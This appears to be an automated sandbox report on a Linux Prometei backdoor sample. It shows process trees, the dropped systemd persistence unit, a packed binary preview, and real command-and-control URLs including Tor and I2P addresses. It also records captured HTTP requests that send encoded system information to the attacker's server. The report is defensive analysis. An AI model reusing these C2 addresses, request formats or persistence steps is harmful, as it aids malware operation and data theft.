Source: /bin/sh (PID: 5229)Pgrep executable: /usr/bin/pgrep -> pgrep zJ4GNlikawJump to behavior
Source: /bin/sh (PID: 5237)Pgrep executable: /usr/bin/pgrep -> pgrep uplugplayJump to behavior
Source: /bin/sh (PID: 5245)Pgrep executable: /usr/bin/pgrep -> pgrep upnpsetupJump to behavior
Source: submitted sampleStderr: Created symlink /etc/systemd/system/multi-user.target.wants/uplugplay.service /lib/systemd/system/uplugplay.service.: exit code = 0

Hooking and other Techniques for Hiding and Protection

barindex
Source: /tmp/zJ4GNlikaw (PID: 5225)File: /usr/sbin/uplugplayJump to dropped file
Source: /tmp/zJ4GNlikaw (PID: 5225)File: /tmp/zJ4GNlikawJump to behavior
Source: /usr/bin/pgrep (PID: 5229)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/pgrep (PID: 5237)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/sbin/uplugplay (PID: 5281)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/uptime (PID: 5344)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /tmp/zJ4GNlikaw (PID: 5225)Queries kernel information via 'uname': Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5278)Queries kernel information via 'uname': Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5281)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/uname (PID: 5348)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/cat (PID: 5308)Reads CPU info from proc file: /proc/cpuinfoJump to behavior
Source: /bin/sh (PID: 5348)Uname executable: /usr/bin/uname -> uname -aJump to behavior
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Scripting
1
Systemd Service
1
Systemd Service
1
Masquerading
1
OS Credential Dumping
1
Security Software Discovery
Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
File and Directory Permissions Modification
LSASS Memory4
System Information Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
Ingress Tool Transfer
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
Scripting
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
Non-Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Obfuscated Files or Information
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer3
Application Layer Protocol
SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
File Deletion
LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size Limits1
Proxy
Manipulate Device CommunicationManipulate App Store Rankings or Ratings
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 559940 Sample: zJ4GNlikaw Startdate: 26/01/2022 Architecture: LINUX Score: 64 76 p3.feefreepool.net 88.198.246.242, 53433, 56830, 56832 HETZNER-ASDE Germany 2->76 78 109.202.202.202, 80 INIT7CH Switzerland 2->78 80 2 other IPs or domains 2->80 82 Multi AV Scanner detection for submitted file 2->82 84 Found Tor onion address 2->84 86 Sample is packed with UPX 2->86 11 zJ4GNlikaw 2->11         started        15 systemd uplugplay 2->15         started        17 systemd snapd-env-generator 2->17         started        19 systemd snapd-env-generator 2->19         started        signatures3 process4 file5 72 /usr/sbin/uplugplay, ELF 11->72 dropped 88 Drops files in suspicious directories 11->88 90 Sample deletes itself 11->90 21 zJ4GNlikaw sh 11->21         started        23 zJ4GNlikaw sh 11->23         started        25 zJ4GNlikaw sh 11->25         started        29 6 other processes 11->29 27 uplugplay 15->27         started        signatures6 process7 process8 31 sh pgrep 21->31         started        33 sh pidof 23->33         started        35 sh pgrep 25->35         started        37 uplugplay sh 27->37         started        39 sh pidof 29->39         started        41 sh pgrep 29->41         started        43 sh pidof 29->43         started        45 3 other processes 29->45 process9 47 sh uplugplay 37->47         started        file10 74 /etc/CommId, ASCII 47->74 dropped 50 uplugplay sh 47->50         started        52 uplugplay sh 47->52         started        54 uplugplay sh 47->54         started        56 8 other processes 47->56 process11 process12 58 sh cat 50->58         started        60 sh dmidecode 52->60         started        62 sh dmidecode 54->62         started        64 sh dmidecode 56->64         started        66 sh dmidecode 56->66         started        68 sh dmidecode 56->68         started        70 5 other processes 56->70
SourceDetectionScannerLabelLink
zJ4GNlikaw18%VirustotalBrowse
zJ4GNlikaw28%ReversingLabsLinux.Backdoor.Prometei
SourceDetectionScannerLabelLink
/usr/sbin/uplugplay28%ReversingLabsLinux.Backdoor.Prometei
No Antivirus matches
SourceDetectionScannerLabelLink
http://p3.feefreepool.net/cgi-bin/prometei.cgi?r=20&i=PG1TCJ8GTFD7733K0%Avira URL Cloudsafe
http://p3.feefreepool.net/cgi-bin/prometei.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rg0%Avira URL Cloudsafe
http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi0%Avira URL Cloudsafe
http://p3.feefreepool.net/cgi-bin/prometei.cgi0%Avira URL Cloudsafe
https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi0%Avira URL Cloudsafe
http://dummy.zero/cgi-bin/prometei.cgi0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
p3.feefreepool.net
88.198.246.242
truetrue
    unknown
    NameMaliciousAntivirus DetectionReputation
    http://p3.feefreepool.net/cgi-bin/prometei.cgi?r=20&i=PG1TCJ8GTFD7733Kfalse
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://p3.feefreepool.net/cgi-bin/prometei.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgzJ4GNlikaw, 5225.1.00000000a41ba199.00000000d55ef298.rw-.sdmptrue
    • Avira URL Cloud: safe
    unknown
    http://upx.sf.netzJ4GNlikaw, uplugplay.10.drfalse
      high
      http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgizJ4GNlikaw, 5225.1.00000000a41ba199.00000000d55ef298.rw-.sdmptrue
      • Avira URL Cloud: safe
      unknown
      http://p3.feefreepool.net/cgi-bin/prometei.cgizJ4GNlikaw, 5225.1.00000000a41ba199.00000000d55ef298.rw-.sdmptrue
      • Avira URL Cloud: safe
      unknown
      https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgizJ4GNlikaw, 5225.1.00000000a41ba199.00000000d55ef298.rw-.sdmptrue
      • Avira URL Cloud: safe
      unknown
      http://dummy.zero/cgi-bin/prometei.cgizJ4GNlikaw, 5225.1.00000000a41ba199.00000000d55ef298.rw-.sdmptrue
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      88.198.246.242
      p3.feefreepool.netGermany
      24940HETZNER-ASDEtrue
      109.202.202.202
      unknownSwitzerland
      13030INIT7CHfalse
      91.189.91.43
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      91.189.91.42
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      88.198.246.242OLzheOx1kwGet hashmaliciousBrowse
      • p3.feefreepool.net/cgi-bin/prometei.cgi?r=16&i=MF97754VWVW4HRWU
      wH04DSYf6gGet hashmaliciousBrowse
      • p3.feefreepool.net/cgi-bin/prometei.cgi?r=16&i=3CL80UN6USPBIKPL
      nRlZAbNdJxGet hashmaliciousBrowse
      • p3.feefreepool.net/cgi-bin/prometei.cgi?r=53&i=5HNN7ZK1006GY32G
      lHxDIlc6HUGet hashmaliciousBrowse
      • p3.feefreepool.net/cgi-bin/prometei.cgi?r=66&i=V9PV9LOR9Q54LN8Z
      PMidZ9jAKZGet hashmaliciousBrowse
      • p3.feefreepool.net/cgi-bin/prometei.cgi?r=58&i=7B1B0KLF45MTZ528
      zsvc.exeGet hashmaliciousBrowse
      • p1.feefreepool.net/cgi-bin/prometei.cgi?r=-1224&i=90Z405GXDA2Q5271
      3V9alTXIliGet hashmaliciousBrowse
      • p1.feefreepool.net/cgi-bin/prometei.cgi?r=0&i=MKWJIGBKXJXI0948
      promet16Get hashmaliciousBrowse
      • p1.feefreepool.net/cgi-bin/prometei.cgi?r=0&i=0X81G723HYG17S60
      promet15Get hashmaliciousBrowse
      • p1.feefreepool.net/cgi-bin/prometei.cgi?r=18&i=6214X121I3A61W1S
      promet2Get hashmaliciousBrowse
      • p1.feefreepool.net/cgi-bin/prometei.cgi?r=18&i=MU2G1NCM0HDF3L2N
      EKbGofM1r6Get hashmaliciousBrowse
      • p1.feefreepool.net/cgi-bin/prometei.cgi?r=0&i=ENEP5O05YTLM46K2
      109.202.202.202zNwwZUz7LiGet hashmaliciousBrowse
        UnHAnaAW.arm5Get hashmaliciousBrowse
          7nY11P6Y2OGet hashmaliciousBrowse
            gg2dS38RTwGet hashmaliciousBrowse
              OLzheOx1kwGet hashmaliciousBrowse
                wH04DSYf6gGet hashmaliciousBrowse
                  nRlZAbNdJxGet hashmaliciousBrowse
                    lHxDIlc6HUGet hashmaliciousBrowse
                      PMidZ9jAKZGet hashmaliciousBrowse
                        atxhuaGet hashmaliciousBrowse
                          cemtopGet hashmaliciousBrowse
                            earyzqGet hashmaliciousBrowse
                              fwdfvfGet hashmaliciousBrowse
                                lnkfmxGet hashmaliciousBrowse
                                  nvitpjGet hashmaliciousBrowse
                                    qtmzbnGet hashmaliciousBrowse
                                      qvmxvlGet hashmaliciousBrowse
                                        razdznGet hashmaliciousBrowse
                                          vtyhatGet hashmaliciousBrowse
                                            vvglmaGet hashmaliciousBrowse
                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              p3.feefreepool.netOLzheOx1kwGet hashmaliciousBrowse
                                              • 88.198.246.242
                                              wH04DSYf6gGet hashmaliciousBrowse
                                              • 88.198.246.242
                                              nRlZAbNdJxGet hashmaliciousBrowse
                                              • 88.198.246.242
                                              lHxDIlc6HUGet hashmaliciousBrowse
                                              • 88.198.246.242
                                              PMidZ9jAKZGet hashmaliciousBrowse
                                              • 88.198.246.242
                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              HETZNER-ASDEUnHAnaAW.arm7Get hashmaliciousBrowse
                                              • 95.217.66.156
                                              UnHAnaAW.x86Get hashmaliciousBrowse
                                              • 159.69.202.118
                                              hP0sCXyT5R.dllGet hashmaliciousBrowse
                                              • 78.47.204.80
                                              hP0sCXyT5R.dllGet hashmaliciousBrowse
                                              • 78.47.204.80
                                              16HZepgKsV.dllGet hashmaliciousBrowse
                                              • 78.47.204.80
                                              66uB4YL3Vt.dllGet hashmaliciousBrowse
                                              • 78.47.204.80
                                              GUYNlLUsvR.dllGet hashmaliciousBrowse
                                              • 78.47.204.80
                                              OLzheOx1kwGet hashmaliciousBrowse
                                              • 88.198.246.242
                                              wH04DSYf6gGet hashmaliciousBrowse
                                              • 88.198.246.242
                                              16HZepgKsV.dllGet hashmaliciousBrowse
                                              • 78.47.204.80
                                              66uB4YL3Vt.dllGet hashmaliciousBrowse
                                              • 78.47.204.80
                                              GUYNlLUsvR.dllGet hashmaliciousBrowse
                                              • 78.47.204.80
                                              F40PptOwCO.dllGet hashmaliciousBrowse
                                              • 78.47.204.80
                                              nRlZAbNdJxGet hashmaliciousBrowse
                                              • 88.198.246.242
                                              34jU7VJQ0aGet hashmaliciousBrowse
                                              • 95.217.66.132
                                              F40PptOwCO.dllGet hashmaliciousBrowse
                                              • 78.47.204.80
                                              lHxDIlc6HUGet hashmaliciousBrowse
                                              • 88.198.246.242
                                              PMidZ9jAKZGet hashmaliciousBrowse
                                              • 88.198.246.242
                                              FedEx Package.exeGet hashmaliciousBrowse
                                              • 144.76.136.153
                                              8sQIwmykhK.dllGet hashmaliciousBrowse
                                              • 78.47.204.80
                                              INIT7CHzNwwZUz7LiGet hashmaliciousBrowse
                                              • 109.202.202.202
                                              UnHAnaAW.arm5Get hashmaliciousBrowse
                                              • 109.202.202.202
                                              7nY11P6Y2OGet hashmaliciousBrowse
                                              • 109.202.202.202
                                              gg2dS38RTwGet hashmaliciousBrowse
                                              • 109.202.202.202
                                              OLzheOx1kwGet hashmaliciousBrowse
                                              • 109.202.202.202
                                              wH04DSYf6gGet hashmaliciousBrowse
                                              • 109.202.202.202
                                              nRlZAbNdJxGet hashmaliciousBrowse
                                              • 109.202.202.202
                                              lHxDIlc6HUGet hashmaliciousBrowse
                                              • 109.202.202.202
                                              PMidZ9jAKZGet hashmaliciousBrowse
                                              • 109.202.202.202
                                              atxhuaGet hashmaliciousBrowse
                                              • 109.202.202.202
                                              cemtopGet hashmaliciousBrowse
                                              • 109.202.202.202
                                              earyzqGet hashmaliciousBrowse
                                              • 109.202.202.202
                                              fwdfvfGet hashmaliciousBrowse
                                              • 109.202.202.202
                                              lnkfmxGet hashmaliciousBrowse
                                              • 109.202.202.202
                                              nvitpjGet hashmaliciousBrowse
                                              • 109.202.202.202
                                              qtmzbnGet hashmaliciousBrowse
                                              • 109.202.202.202
                                              qvmxvlGet hashmaliciousBrowse
                                              • 109.202.202.202
                                              razdznGet hashmaliciousBrowse
                                              • 109.202.202.202
                                              vtyhatGet hashmaliciousBrowse
                                              • 109.202.202.202
                                              vvglmaGet hashmaliciousBrowse
                                              • 109.202.202.202
                                              No context
                                              No context
                                              Process:/usr/sbin/uplugplay
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):16
                                              Entropy (8bit):3.5
                                              Encrypted:false
                                              SSDEEP:3:/YgHu:/XHu
                                              MD5:2DC2712DDFDE541D649CA8932CC654D8
                                              SHA1:684A44391DB5DC62798C46CD6B68088F3D94B0CB
                                              SHA-256:FC763E6545FF7C8EA18453643EFD766A82EA8E153DBC64E439967F0CB5ACCC88
                                              SHA-512:79B3EA7294B54CCCF37B46D69AFB14D4D0ECBD9320117594D03BBC06C882A4A7A8B879F73A45168386F2ADA71645EC70CC28EF29016E09C468F3E4883CDCB501
                                              Malicious:true
                                              Reputation:low
                                              Preview:PG1TCJ8GTFD7733K
                                              Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):76
                                              Entropy (8bit):3.7627880354948586
                                              Encrypted:false
                                              SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                              MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                              SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                              SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                              SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                              Process:/tmp/zJ4GNlikaw
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):145
                                              Entropy (8bit):4.769509838572339
                                              Encrypted:false
                                              SSDEEP:3:zMZa75X1PxQJqtWA1+DRvBADMikAdIgQ+aQmNJX4ev+sirSkQmWA1+DRvn:z8uXcqtWA4RZAMD+aBNdhTILQmWA4Rv
                                              MD5:8CA62D1F47880BCE036C2956C9B7B272
                                              SHA1:3BCC3A5C4FCC5B0D08C4524A59F6B8E113B62060
                                              SHA-256:C655D3D4E374FAD38313EC4262207B2D7D68A870238F203EF3C33F85E66C8E32
                                              SHA-512:4CD2D9D67151FA25E833707DEE2442C4A5F752053FC2C36EC73C0E2B734C66CA69C63FCEB47714D9ADD5B9FE2EEE1E45BE5199E2CAE7C26173E766B333877DA6
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:[Unit].Description=UPlugPlay.After=multi-user.target..[Service].Type=forking.ExecStart=/usr/sbin/uplugplay..[Install].WantedBy=multi-user.target.
                                              Process:/tmp/zJ4GNlikaw
                                              File Type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
                                              Category:dropped
                                              Size (bytes):426540
                                              Entropy (8bit):7.94213494664567
                                              Encrypted:false
                                              SSDEEP:12288:vuUGbSUQf6LndsBl8c7Imd7Bb7PfZwZfYEmvozMyA:vuuujdCr7X57HZwVEoY
                                              MD5:BCE23A57891F9AD0DFBDE06B00DE2B93
                                              SHA1:837126517E222E053CC04D0CD261A7E8572052F7
                                              SHA-256:0D71910FEABF834689237D5B51392EAEF8356503D5C2D29D930B8C9055B19FA9
                                              SHA-512:23EDD420778B10DBBCF832C3E22B0D0DF8A6C5875A5F50A5BDC14261BE0EC2ECF847B4C0B27D20FE844EA3C214B23A3346B143CE21D2899833D7190BD0E23F82
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: SUSP_ELF_LNX_UPX_Compressed_File, Description: Detects a suspicious ELF binary with UPX compression, Source: /usr/sbin/uplugplay, Author: Florian Roth
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 28%
                                              Reputation:low
                                              Preview:.ELF..............>......pF.....@...................@.8...@.......................@.......@......y.......y................................F.......F.............................Q.td....................................................k&1FUPX!$........(...(..p............. ..ELF......>....@........ .'8..........W.3c..-.......o..K>...@Q....obo...N...|...o...={...-.Q.`XO...m..o..p..@.... ....on.....D_D..uK...O._.m(.S.tdO..n.Qn....s;.oRO.....0...*I.$.P.............y......GNU....'..l......?...y1qN...v.r=Q...!`X.,........_....Q.%.yr...SM./P..^...p.D.....BF.0.....]....K........y.../..p........LG...._...#/v..._P.C2.b.`...y!#...x0...@p..d.L.h..`r!#/..X...vP_./H....@?.TM"8..8.0O...`(...q.\. ..O.$ar .@%I.Q....]...I-.n.......H...H...H..t..."...9.....?..%......D................................}....ume....]U....ME=....5-%..................-..E.t$..T$.<{....%.....H.|$.....9.g...Sd2.OH.. ......kn(...$. 1.H9.`K..t>d....4..u......>2..w..H.. -U.H.=$...o....... ......=.._w.Ru6...k....N.y.
                                              File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
                                              Entropy (8bit):7.94213494664567
                                              TrID:
                                              • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                              • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                              File name:zJ4GNlikaw
                                              File size:426540
                                              MD5:bce23a57891f9ad0dfbde06b00de2b93
                                              SHA1:837126517e222e053cc04d0cd261a7e8572052f7
                                              SHA256:0d71910feabf834689237d5b51392eaef8356503d5c2d29d930b8c9055b19fa9
                                              SHA512:23edd420778b10dbbcf832c3e22b0d0df8a6c5875a5f50a5bdc14261be0ec2ecf847b4c0b27d20fe844ea3c214b23a3346b143ce21d2899833d7190bd0e23f82
                                              SSDEEP:12288:vuUGbSUQf6LndsBl8c7Imd7Bb7PfZwZfYEmvozMyA:vuuujdCr7X57HZwVEoY
                                              File Content Preview:.ELF..............>......pF.....@...................@.8...@.......................@.......@......y.......y................................F.......F.............................Q.td....................................................k&1FUPX!$........(...(.

                                              ELF header

                                              Class:ELF64
                                              Data:2's complement, little endian
                                              Version:1 (current)
                                              Machine:Advanced Micro Devices X86-64
                                              Version Number:0x1
                                              Type:EXEC (Executable file)
                                              OS/ABI:UNIX - System V
                                              ABI Version:0
                                              Entry Point Address:0x467088
                                              Flags:0x0
                                              ELF Header Size:64
                                              Program Header Offset:64
                                              Program Header Size:56
                                              Number of Program Headers:3
                                              Section Header Offset:0
                                              Section Header Size:64
                                              Number of Section Headers:0
                                              Header String Table Index:0
                                              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                              LOAD0x00x4000000x4000000x679a30x679a34.33740x5R E0x1000
                                              LOAD0x00x4680000x4680000x00xe1d4980.00000x6RW 0x1000
                                              GNU_STACK0x00x00x00x00x00.00000x6RW 0x10
                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 26, 2022 01:21:49.964385986 CET42836443192.168.2.2391.189.91.43
                                              Jan 26, 2022 01:21:50.476309061 CET4251680192.168.2.23109.202.202.202
                                              Jan 26, 2022 01:22:04.555871010 CET43928443192.168.2.2391.189.91.42
                                              Jan 26, 2022 01:22:06.149537086 CET5683080192.168.2.2388.198.246.242
                                              Jan 26, 2022 01:22:06.171344042 CET805683088.198.246.242192.168.2.23
                                              Jan 26, 2022 01:22:06.171442986 CET5683080192.168.2.2388.198.246.242
                                              Jan 26, 2022 01:22:06.181456089 CET5683080192.168.2.2388.198.246.242
                                              Jan 26, 2022 01:22:06.254328012 CET805683088.198.246.242192.168.2.23
                                              Jan 26, 2022 01:22:10.951538086 CET805683088.198.246.242192.168.2.23
                                              Jan 26, 2022 01:22:10.951724052 CET5683080192.168.2.2388.198.246.242
                                              Jan 26, 2022 01:22:10.952080965 CET805683088.198.246.242192.168.2.23
                                              Jan 26, 2022 01:22:10.957076073 CET5683080192.168.2.2388.198.246.242
                                              Jan 26, 2022 01:22:10.978892088 CET805683088.198.246.242192.168.2.23
                                              Jan 26, 2022 01:22:14.228084087 CET5683280192.168.2.2388.198.246.242
                                              Jan 26, 2022 01:22:14.249953032 CET805683288.198.246.242192.168.2.23
                                              Jan 26, 2022 01:22:14.250056982 CET5683280192.168.2.2388.198.246.242
                                              Jan 26, 2022 01:22:14.250920057 CET5683280192.168.2.2388.198.246.242
                                              Jan 26, 2022 01:22:14.322916031 CET805683288.198.246.242192.168.2.23
                                              Jan 26, 2022 01:22:16.843575001 CET42836443192.168.2.2391.189.91.43
                                              Jan 26, 2022 01:22:18.408107996 CET805683288.198.246.242192.168.2.23
                                              Jan 26, 2022 01:22:18.408271074 CET5683280192.168.2.2388.198.246.242
                                              Jan 26, 2022 01:22:18.408720016 CET805683288.198.246.242192.168.2.23
                                              Jan 26, 2022 01:22:18.408946991 CET5683280192.168.2.2388.198.246.242
                                              Jan 26, 2022 01:22:18.430762053 CET805683288.198.246.242192.168.2.23
                                              Jan 26, 2022 01:22:20.939507961 CET4251680192.168.2.23109.202.202.202
                                              Jan 26, 2022 01:22:45.514713049 CET43928443192.168.2.2391.189.91.42
                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 26, 2022 01:22:06.129731894 CET5136753192.168.2.238.8.8.8
                                              Jan 26, 2022 01:22:06.149260998 CET53513678.8.8.8192.168.2.23
                                              Jan 26, 2022 01:22:07.633919954 CET5343380192.168.2.2388.198.246.242
                                              Jan 26, 2022 01:22:07.656100988 CET805343388.198.246.242192.168.2.23
                                              Jan 26, 2022 01:22:11.656208992 CET5343380192.168.2.2388.198.246.242
                                              Jan 26, 2022 01:22:11.861547947 CET5343380192.168.2.2388.198.246.242
                                              Jan 26, 2022 01:22:14.208348989 CET5666753192.168.2.238.8.8.8
                                              Jan 26, 2022 01:22:14.227864027 CET53566678.8.8.8192.168.2.23
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Jan 26, 2022 01:22:06.129731894 CET192.168.2.238.8.8.80x14a1Standard query (0)p3.feefreepool.netA (IP address)IN (0x0001)
                                              Jan 26, 2022 01:22:14.208348989 CET192.168.2.238.8.8.80x14a1Standard query (0)p3.feefreepool.netA (IP address)IN (0x0001)
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Jan 26, 2022 01:22:06.149260998 CET8.8.8.8192.168.2.230x14a1No error (0)p3.feefreepool.net88.198.246.242A (IP address)IN (0x0001)
                                              Jan 26, 2022 01:22:14.227864027 CET8.8.8.8192.168.2.230x14a1No error (0)p3.feefreepool.net88.198.246.242A (IP address)IN (0x0001)
                                              • p3.feefreepool.net
                                              Session IDSource IPSource PortDestination IPDestination Port
                                              0192.168.2.235683088.198.246.24280
                                              TimestampkBytes transferredDirectionData
                                              Jan 26, 2022 01:22:06.181456089 CET0OUTGET /cgi-bin/prometei.cgi?r=20&i=PG1TCJ8GTFD7733K HTTP/1.0
                                              Host: p3.feefreepool.net
                                              Jan 26, 2022 01:22:10.951538086 CET1INHTTP/1.1 200 OK
                                              Date: Wed, 26 Jan 2022 00:22:14 GMT
                                              Server: Apache/2.2.8 (Win32) mod_ssl/2.2.8 OpenSSL/0.9.8g PHP/5.2.6
                                              Content-Length: 7
                                              Connection: close
                                              Content-Type: text/html; charset=windows-1251
                                              Data Raw: 73 79 73 69 6e 66 6f
                                              Data Ascii: sysinfo


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1192.168.2.235683288.198.246.24280
                                              TimestampkBytes transferredDirectionData
                                              Jan 26, 2022 01:22:14.250920057 CET2OUTGET /cgi-bin/prometei.cgi?add=aW5mbyB7DQp2My4wM0xfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCg0KDQoNCg0KDQpVYnVudHUgJiAyMC4wNC4yIExUUyAoRm9jYWwgRm9zc2EpIA0KDQovdXNyL3NiaW4vDQogMDE6MjI6MTMgdXAgNyBtaW4sICAxIHVzZXIsICBsb2FkIGF2ZXJhZ2U6IDIuMjQsIDAuOTUsIDAuMzkNCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=PG1TCJ8GTFD7733K&h=galassia&enckey=9UNOuoI4HO7z2juEGVXzZ14B86yLZV0kzRTkL30g0vgodyftH81kCBgwol4Mwe555o+sae8/aTlydoB8bk2MJ6g1nXa228vSyhwZgVCZYDPRqq4bj4Uintqr/xXdN/lSTVDrpk0ZmX92rkFNB9Y2gklDBAHABdGgvZM2OIXXy24= HTTP/1.0
                                              Host: p3.feefreepool.net
                                              Jan 26, 2022 01:22:18.408107996 CET3INHTTP/1.1 200 OK
                                              Date: Wed, 26 Jan 2022 00:22:22 GMT
                                              Server: Apache/2.2.8 (Win32) mod_ssl/2.2.8 OpenSSL/0.9.8g PHP/5.2.6
                                              Content-Length: 3
                                              Connection: close
                                              Content-Type: text/html; charset=windows-1251
                                              Data Raw: 6f 6b 21 0d 0a 43 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 0a 0a
                                              Data Ascii: ok!Content-type: text/html; charset=windows-1251


                                              System Behavior

                                              Start time:01:21:49
                                              Start date:26/01/2022
                                              Path:/tmp/zJ4GNlikaw
                                              Arguments:/tmp/zJ4GNlikaw
                                              File size:426540 bytes
                                              MD5 hash:bce23a57891f9ad0dfbde06b00de2b93

                                              Start time:01:21:49
                                              Start date:26/01/2022
                                              Path:/tmp/zJ4GNlikaw
                                              Arguments:n/a
                                              File size:426540 bytes
                                              MD5 hash:bce23a57891f9ad0dfbde06b00de2b93

                                              Start time:01:21:49
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:sh -c "pgrep zJ4GNlikaw"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:21:49
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:n/a
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:21:49
                                              Start date:26/01/2022
                                              Path:/usr/bin/pgrep
                                              Arguments:pgrep zJ4GNlikaw
                                              File size:30968 bytes
                                              MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                              Start time:01:21:50
                                              Start date:26/01/2022
                                              Path:/tmp/zJ4GNlikaw
                                              Arguments:n/a
                                              File size:426540 bytes
                                              MD5 hash:bce23a57891f9ad0dfbde06b00de2b93

                                              Start time:01:21:50
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:sh -c "pidof zJ4GNlikaw"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:21:50
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:n/a
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:21:50
                                              Start date:26/01/2022
                                              Path:/usr/bin/pidof
                                              Arguments:pidof zJ4GNlikaw
                                              File size:27016 bytes
                                              MD5 hash:f58f67968fc50f1497f9ea9e9c22b6e8

                                              Start time:01:21:51
                                              Start date:26/01/2022
                                              Path:/tmp/zJ4GNlikaw
                                              Arguments:n/a
                                              File size:426540 bytes
